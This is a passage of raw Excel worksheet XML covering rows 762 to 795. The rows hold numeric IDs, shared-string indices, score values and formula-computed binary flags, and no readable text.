      <c r="F762" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G762" s="62">
        <v>0.9</v>
      </c>
      <c r="H762" s="64">
        <v>1.0</v>
      </c>
      <c r="I762" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J762" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K762" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L762" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O762" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="62">
        <v>6262.0</v>
      </c>
      <c r="B763" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C763" s="63" t="s">
        <v>2482</v>
      </c>
      <c r="D763" s="62" t="s">
        <v>2483</v>
      </c>
      <c r="E763" s="62" t="s">
        <v>2484</v>
      </c>
      <c r="F763" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G763" s="62">
        <v>0.9</v>
      </c>
      <c r="H763" s="64">
        <v>1.0</v>
      </c>
      <c r="I763" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J763" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K763" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L763" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M763" s="62" t="s">
        <v>2485</v>
      </c>
      <c r="N763" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O763" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="62">
        <v>6379.0</v>
      </c>
      <c r="B764" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C764" s="63" t="s">
        <v>2486</v>
      </c>
      <c r="D764" s="62" t="s">
        <v>2487</v>
      </c>
      <c r="E764" s="62" t="s">
        <v>2488</v>
      </c>
      <c r="F764" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G764" s="62">
        <v>0.85</v>
      </c>
      <c r="H764" s="64">
        <v>0.0</v>
      </c>
      <c r="I764" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J764" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K764" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L764" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O764" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="62">
        <v>6497.0</v>
      </c>
      <c r="B765" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C765" s="63" t="s">
        <v>2489</v>
      </c>
      <c r="D765" s="62" t="s">
        <v>2490</v>
      </c>
      <c r="E765" s="62" t="s">
        <v>2491</v>
      </c>
      <c r="F765" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G765" s="62">
        <v>0.85</v>
      </c>
      <c r="H765" s="64">
        <v>1.0</v>
      </c>
      <c r="I765" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J765" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K765" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L765" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O765" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="62">
        <v>6576.0</v>
      </c>
      <c r="B766" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C766" s="63" t="s">
        <v>2492</v>
      </c>
      <c r="D766" s="62" t="s">
        <v>2493</v>
      </c>
      <c r="E766" s="62" t="s">
        <v>2494</v>
      </c>
      <c r="F766" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G766" s="62">
        <v>0.85</v>
      </c>
      <c r="H766" s="64">
        <v>1.0</v>
      </c>
      <c r="I766" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J766" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K766" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L766" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O766" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="62">
        <v>1.0</v>
      </c>
      <c r="B767" s="62" t="s">
        <v>90</v>
      </c>
      <c r="C767" s="63" t="s">
        <v>2495</v>
      </c>
      <c r="D767" s="62" t="s">
        <v>2496</v>
      </c>
      <c r="E767" s="62" t="s">
        <v>2497</v>
      </c>
      <c r="F767" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G767" s="62">
        <v>0.9</v>
      </c>
      <c r="H767" s="64">
        <v>0.0</v>
      </c>
      <c r="I767" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J767" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K767" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L767" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M767" s="62" t="s">
        <v>2498</v>
      </c>
      <c r="N767" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O767" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="62">
        <v>3.0</v>
      </c>
      <c r="B768" s="62" t="s">
        <v>90</v>
      </c>
      <c r="C768" s="63" t="s">
        <v>2499</v>
      </c>
      <c r="D768" s="62" t="s">
        <v>2500</v>
      </c>
      <c r="E768" s="62" t="s">
        <v>2501</v>
      </c>
      <c r="F768" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G768" s="62">
        <v>0.9</v>
      </c>
      <c r="H768" s="64">
        <v>1.0</v>
      </c>
      <c r="I768" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J768" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K768" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L768" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O768" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="62">
        <v>355.0</v>
      </c>
      <c r="B769" s="62" t="s">
        <v>90</v>
      </c>
      <c r="C769" s="63" t="s">
        <v>2502</v>
      </c>
      <c r="D769" s="62" t="s">
        <v>2503</v>
      </c>
      <c r="E769" s="62" t="s">
        <v>2504</v>
      </c>
      <c r="F769" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G769" s="62">
        <v>0.9</v>
      </c>
      <c r="H769" s="64">
        <v>1.0</v>
      </c>
      <c r="I769" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J769" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K769" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L769" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O769" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="62">
        <v>1.0</v>
      </c>
      <c r="B770" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C770" s="63" t="s">
        <v>2505</v>
      </c>
      <c r="D770" s="62" t="s">
        <v>2506</v>
      </c>
      <c r="E770" s="62" t="s">
        <v>2507</v>
      </c>
      <c r="F770" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G770" s="62">
        <v>0.8</v>
      </c>
      <c r="H770" s="64">
        <v>0.0</v>
      </c>
      <c r="I770" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J770" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K770" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L770" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O770" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="62">
        <v>19.0</v>
      </c>
      <c r="B771" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C771" s="63" t="s">
        <v>2508</v>
      </c>
      <c r="D771" s="62" t="s">
        <v>2509</v>
      </c>
      <c r="E771" s="62" t="s">
        <v>2510</v>
      </c>
      <c r="F771" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G771" s="62">
        <v>0.9</v>
      </c>
      <c r="H771" s="64">
        <v>1.0</v>
      </c>
      <c r="I771" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J771" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K771" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L771" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O771" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="62">
        <v>91.0</v>
      </c>
      <c r="B772" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C772" s="63" t="s">
        <v>2511</v>
      </c>
      <c r="D772" s="62" t="s">
        <v>2512</v>
      </c>
      <c r="E772" s="62" t="s">
        <v>2513</v>
      </c>
      <c r="F772" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G772" s="62">
        <v>0.95</v>
      </c>
      <c r="H772" s="64">
        <v>1.0</v>
      </c>
      <c r="I772" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J772" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K772" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L772" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O772" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="62">
        <v>95.0</v>
      </c>
      <c r="B773" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C773" s="63" t="s">
        <v>2514</v>
      </c>
      <c r="D773" s="62" t="s">
        <v>2515</v>
      </c>
      <c r="E773" s="62" t="s">
        <v>2516</v>
      </c>
      <c r="F773" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G773" s="62">
        <v>0.9</v>
      </c>
      <c r="H773" s="64">
        <v>1.0</v>
      </c>
      <c r="I773" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J773" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K773" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L773" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O773" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="62">
        <v>103.0</v>
      </c>
      <c r="B774" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C774" s="63" t="s">
        <v>2517</v>
      </c>
      <c r="D774" s="62" t="s">
        <v>2518</v>
      </c>
      <c r="E774" s="62" t="s">
        <v>2519</v>
      </c>
      <c r="F774" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G774" s="62">
        <v>0.95</v>
      </c>
      <c r="H774" s="64">
        <v>1.0</v>
      </c>
      <c r="I774" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J774" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K774" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L774" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O774" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="62">
        <v>135.0</v>
      </c>
      <c r="B775" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C775" s="63" t="s">
        <v>2520</v>
      </c>
      <c r="D775" s="62" t="s">
        <v>2521</v>
      </c>
      <c r="E775" s="62" t="s">
        <v>2522</v>
      </c>
      <c r="F775" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G775" s="62">
        <v>0.9</v>
      </c>
      <c r="H775" s="64">
        <v>1.0</v>
      </c>
      <c r="I775" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J775" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K775" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L775" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O775" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="62">
        <v>175.0</v>
      </c>
      <c r="B776" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C776" s="63" t="s">
        <v>2523</v>
      </c>
      <c r="D776" s="62" t="s">
        <v>2524</v>
      </c>
      <c r="E776" s="62" t="s">
        <v>2525</v>
      </c>
      <c r="F776" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G776" s="62">
        <v>0.9</v>
      </c>
      <c r="H776" s="64">
        <v>1.0</v>
      </c>
      <c r="I776" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J776" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K776" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L776" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O776" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="62">
        <v>177.0</v>
      </c>
      <c r="B777" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C777" s="63" t="s">
        <v>2526</v>
      </c>
      <c r="D777" s="62" t="s">
        <v>2527</v>
      </c>
      <c r="E777" s="62" t="s">
        <v>2528</v>
      </c>
      <c r="F777" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G777" s="62">
        <v>0.9</v>
      </c>
      <c r="H777" s="64">
        <v>1.0</v>
      </c>
      <c r="I777" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J777" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K777" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L777" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O777" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="62">
        <v>187.0</v>
      </c>
      <c r="B778" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C778" s="63" t="s">
        <v>2529</v>
      </c>
      <c r="D778" s="62" t="s">
        <v>2530</v>
      </c>
      <c r="E778" s="62" t="s">
        <v>2531</v>
      </c>
      <c r="F778" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G778" s="62">
        <v>0.95</v>
      </c>
      <c r="H778" s="64">
        <v>1.0</v>
      </c>
      <c r="I778" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J778" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K778" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L778" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O778" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="62">
        <v>190.0</v>
      </c>
      <c r="B779" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C779" s="63" t="s">
        <v>2532</v>
      </c>
      <c r="D779" s="62" t="s">
        <v>2533</v>
      </c>
      <c r="E779" s="62" t="s">
        <v>2534</v>
      </c>
      <c r="F779" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G779" s="62">
        <v>0.9</v>
      </c>
      <c r="H779" s="64">
        <v>1.0</v>
      </c>
      <c r="I779" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J779" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K779" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L779" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O779" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="62">
        <v>224.0</v>
      </c>
      <c r="B780" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C780" s="63" t="s">
        <v>2535</v>
      </c>
      <c r="D780" s="62" t="s">
        <v>2536</v>
      </c>
      <c r="E780" s="62" t="s">
        <v>2537</v>
      </c>
      <c r="F780" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G780" s="62">
        <v>0.9</v>
      </c>
      <c r="H780" s="64">
        <v>0.0</v>
      </c>
      <c r="I780" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J780" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K780" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L780" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O780" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="62">
        <v>236.0</v>
      </c>
      <c r="B781" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C781" s="63" t="s">
        <v>2538</v>
      </c>
      <c r="D781" s="62" t="s">
        <v>2539</v>
      </c>
      <c r="E781" s="62" t="s">
        <v>2540</v>
      </c>
      <c r="F781" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G781" s="62">
        <v>0.8</v>
      </c>
      <c r="H781" s="64">
        <v>1.0</v>
      </c>
      <c r="I781" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J781" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K781" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L781" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O781" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="62">
        <v>242.0</v>
      </c>
      <c r="B782" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C782" s="63" t="s">
        <v>2541</v>
      </c>
      <c r="D782" s="62" t="s">
        <v>2542</v>
      </c>
      <c r="E782" s="62" t="s">
        <v>2543</v>
      </c>
      <c r="F782" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G782" s="62">
        <v>0.9</v>
      </c>
      <c r="H782" s="64">
        <v>1.0</v>
      </c>
      <c r="I782" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J782" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K782" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L782" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M782" s="62" t="s">
        <v>2544</v>
      </c>
      <c r="N782" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O782" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="62">
        <v>369.0</v>
      </c>
      <c r="B783" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C783" s="63" t="s">
        <v>2545</v>
      </c>
      <c r="D783" s="62" t="s">
        <v>2546</v>
      </c>
      <c r="E783" s="62" t="s">
        <v>2547</v>
      </c>
      <c r="F783" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G783" s="62">
        <v>0.9</v>
      </c>
      <c r="H783" s="64">
        <v>1.0</v>
      </c>
      <c r="I783" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J783" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K783" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L783" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O783" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="62">
        <v>387.0</v>
      </c>
      <c r="B784" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C784" s="63" t="s">
        <v>2548</v>
      </c>
      <c r="D784" s="62" t="s">
        <v>2549</v>
      </c>
      <c r="E784" s="62" t="s">
        <v>2550</v>
      </c>
      <c r="F784" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G784" s="62">
        <v>0.95</v>
      </c>
      <c r="H784" s="64">
        <v>1.0</v>
      </c>
      <c r="I784" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J784" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K784" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L784" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O784" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="62">
        <v>402.0</v>
      </c>
      <c r="B785" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C785" s="63" t="s">
        <v>2551</v>
      </c>
      <c r="D785" s="62" t="s">
        <v>2552</v>
      </c>
      <c r="E785" s="62" t="s">
        <v>2553</v>
      </c>
      <c r="F785" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G785" s="62">
        <v>0.9</v>
      </c>
      <c r="H785" s="64">
        <v>0.0</v>
      </c>
      <c r="I785" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J785" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K785" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L785" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O785" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="62">
        <v>403.0</v>
      </c>
      <c r="B786" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C786" s="63" t="s">
        <v>2554</v>
      </c>
      <c r="D786" s="62" t="s">
        <v>2555</v>
      </c>
      <c r="E786" s="62" t="s">
        <v>2556</v>
      </c>
      <c r="F786" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G786" s="62">
        <v>0.9</v>
      </c>
      <c r="H786" s="64">
        <v>1.0</v>
      </c>
      <c r="I786" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J786" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K786" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L786" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O786" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="62">
        <v>410.0</v>
      </c>
      <c r="B787" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C787" s="63" t="s">
        <v>2557</v>
      </c>
      <c r="D787" s="62" t="s">
        <v>2558</v>
      </c>
      <c r="E787" s="62" t="s">
        <v>2559</v>
      </c>
      <c r="F787" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G787" s="62">
        <v>0.9</v>
      </c>
      <c r="H787" s="64">
        <v>1.0</v>
      </c>
      <c r="I787" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J787" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K787" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L787" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O787" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="62">
        <v>412.0</v>
      </c>
      <c r="B788" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C788" s="63" t="s">
        <v>2560</v>
      </c>
      <c r="D788" s="62" t="s">
        <v>2561</v>
      </c>
      <c r="E788" s="62" t="s">
        <v>2562</v>
      </c>
      <c r="F788" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G788" s="62">
        <v>0.9</v>
      </c>
      <c r="H788" s="64">
        <v>1.0</v>
      </c>
      <c r="I788" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J788" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K788" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L788" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O788" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="62">
        <v>413.0</v>
      </c>
      <c r="B789" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C789" s="63" t="s">
        <v>2563</v>
      </c>
      <c r="D789" s="62" t="s">
        <v>2564</v>
      </c>
      <c r="E789" s="62" t="s">
        <v>2565</v>
      </c>
      <c r="F789" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G789" s="62">
        <v>0.85</v>
      </c>
      <c r="H789" s="64" t="s">
        <v>577</v>
      </c>
      <c r="I789" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J789" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K789" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L789" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M789" s="62" t="s">
        <v>2566</v>
      </c>
      <c r="N789" s="62" t="s">
        <v>2567</v>
      </c>
      <c r="O789" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="62">
        <v>425.0</v>
      </c>
      <c r="B790" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C790" s="63" t="s">
        <v>2568</v>
      </c>
      <c r="D790" s="62" t="s">
        <v>2569</v>
      </c>
      <c r="E790" s="62" t="s">
        <v>2570</v>
      </c>
      <c r="F790" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G790" s="62">
        <v>0.9</v>
      </c>
      <c r="H790" s="64">
        <v>0.0</v>
      </c>
      <c r="I790" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J790" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K790" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L790" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O790" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="62">
        <v>466.0</v>
      </c>
      <c r="B791" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C791" s="63" t="s">
        <v>2571</v>
      </c>
      <c r="D791" s="62" t="s">
        <v>2572</v>
      </c>
      <c r="E791" s="62" t="s">
        <v>2573</v>
      </c>
      <c r="F791" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G791" s="62">
        <v>0.9</v>
      </c>
      <c r="H791" s="64">
        <v>1.0</v>
      </c>
      <c r="I791" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J791" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K791" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L791" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O791" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="62">
        <v>489.0</v>
      </c>
      <c r="B792" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C792" s="63" t="s">
        <v>2574</v>
      </c>
      <c r="D792" s="62" t="s">
        <v>2575</v>
      </c>
      <c r="E792" s="62" t="s">
        <v>2576</v>
      </c>
      <c r="F792" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G792" s="62">
        <v>0.9</v>
      </c>
      <c r="H792" s="64">
        <v>1.0</v>
      </c>
      <c r="I792" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J792" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K792" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L792" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M792" s="62" t="s">
        <v>2577</v>
      </c>
      <c r="N792" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O792" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="62">
        <v>493.0</v>
      </c>
      <c r="B793" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C793" s="63" t="s">
        <v>2578</v>
      </c>
      <c r="D793" s="62" t="s">
        <v>2579</v>
      </c>
      <c r="E793" s="62" t="s">
        <v>2580</v>
      </c>
      <c r="F793" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G793" s="62">
        <v>0.9</v>
      </c>
      <c r="H793" s="64">
        <v>1.0</v>
      </c>
      <c r="I793" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J793" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K793" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L793" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O793" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="62">
        <v>550.0</v>
      </c>
      <c r="B794" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C794" s="63" t="s">
        <v>2581</v>
      </c>
      <c r="D794" s="62" t="s">
        <v>2582</v>
      </c>
      <c r="E794" s="62" t="s">
        <v>2583</v>
      </c>
      <c r="F794" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G794" s="62">
        <v>0.9</v>
      </c>
      <c r="H794" s="64">
        <v>1.0</v>
      </c>
      <c r="I794" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J794" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K794" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L794" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O794" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="62">
        <v>630.0</v>
      </c>
      <c r="B795" s="62" t="s">
        <v>92</v>
      </c>
      <c r="C795" s="63" t="s">
        <v>2584</v>
      </c>
      <c r="D795" s="62" t="s">
        <v>2585</v>
      </c>
      <c r="E795" s="62" t="s">
        <v>2586</v>
      </c>
      <c r="F795" s="62" t="s">
        <v>134</v>
